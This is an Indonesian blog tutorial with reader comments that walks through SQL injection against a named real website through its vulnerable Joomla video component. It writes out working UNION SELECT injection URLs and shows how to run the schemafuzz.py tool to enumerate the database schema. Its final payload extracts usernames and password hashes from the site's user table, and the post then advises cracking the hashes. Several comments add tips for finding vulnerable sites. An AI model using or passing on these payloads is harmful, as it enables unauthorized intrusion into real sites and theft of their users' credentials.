SQL Injection With Schemafuzz

SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.

Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQL

http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

lihat pesan kesalahannya dibawah ada angka 3

Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :

C:\Python26>schemafuzz.py -u "http://www.windsurfing.grindex.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22/*"

Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :

untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.

setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.


http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users/*


hasilnya seperti ini :

dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.

Artikel ini juga bisa dilihat Disini.

16 Komentar

  1. bagaimana cara mencari atau Nge-test SQL vulnerable nya?

    BalasHapus
  2. @sumpit

    ada banyak cara untuk untuk mengetesnya cara yang paling sering dilakukan adalah dengan memberi single quote (') pada akhir url, misalnya www.xxx.com/news.php?id=1 sehingga menjadi www.xxx.com/news.php?id=1' jika dia mempunyai vurnerable SQL maka akan muncul pesan kesalahan.
    sekian mudah-mudahan bisa membantu :D

    BalasHapus
  3. makin hari makin mntap aja kau tur hiks hiks
    keren mntp lanjutkan perjuanganmu tur hehehe

    BalasHapus
  4. @bernadsatriani

    hehe ane juga masih cupu ka,lum bisa apa2 masih harus banyak belajar :)

    BalasHapus
  5. gimana cara nyari sSQL vulnerabelnya???
    bantuin donk>>>

    BalasHapus
  6. @Yoyo : Caranya gimana y ane juga g bisa :D hehe ..

    coba j kasih tanda petik satu di URL-nya ada muncul pesan eror atau halamannya berubah g? klo ada eror berarti kemungkinan besar web itu Vuln

    klo g da tapi halamannya berubah dia juga kemungkinan Vuln tapi Blink jadi pake Blind SQL Injection,

    maaf y klo salah ane masih cupu sich :).

    BalasHapus
  7. ketika saya ketikkan:
    schemafuzz.py -u "http://contoh-target/profile.php?id=1" --findcol

    yang muncul selalu:
    Site must follow -f,-u,-s or -e flag and contain 'darkc0de'

    kenapa????

    BalasHapus
  8. klu gitu aja udah capek baca di google...

    udah ada 1000 posting...

    yg di butuh kan itu ya MD5 decrypt nya...

    Tekan C spasi D

    Cape Deeeeeeeeeeeeeeeeeeeeeeeee >.<

    BalasHapus
  9. @Anonim : Klo mank anda dah bisa n dah bosen baca y g usah baca, klo q kan masih cupu lum ada apa2nya ..

    saya rasa untuk MD5 decrypt banyak situs yang menyediakan, di milw0rm ada disitus lain juga banyak ko ...

    BalasHapus
  10. Mbah google is the best buat cari info
    cari aja MD5 nya di sana kk ^_^V

    BTW for admin tqs atas ilmunya yach ehehehehe

    tapi aku masih bingung nih yang bedain itu MD5,Base64,and encrypt2 lainnya apa ya >.< dari kmrn gak nemu2 beda nya >.<

    BalasHapus
  11. pak admin sekedar sedikit info sedikit
    Google URL extrator
    Mungkin ini salah satu alat untuk ngeliat vulnerable dari web...
    cuma di Google URL extrator ini ada file yang akan di kenali sebagai cirus oleh antivirus...

    pasangannya pake SQL Exploiter
    maaf ini cuma cara lama

    saya masih sangat2 newbie >.<
    sekedar numpang sharing aja ^_^V

    BalasHapus
  12. klo instal di ubuntu 8.04 HH gimana nich kang

    BalasHapus
  13. wah,,,tutorialnya bagus bang,,,,terimaakasih,,,,its time to trying,,,,,

    BalasHapus
  14. bagaimana kalo da variable text? cth: http://bla.php?c=blaa-bla trus di inject model apa aja di nge-blank aj

    BalasHapus
  15. da Yg px Instalan schemafuzz.py g????

    q nyari2 g dapat..

    please???

    ato downloadx d mna???

    BalasHapus
Lebih baru Lebih lama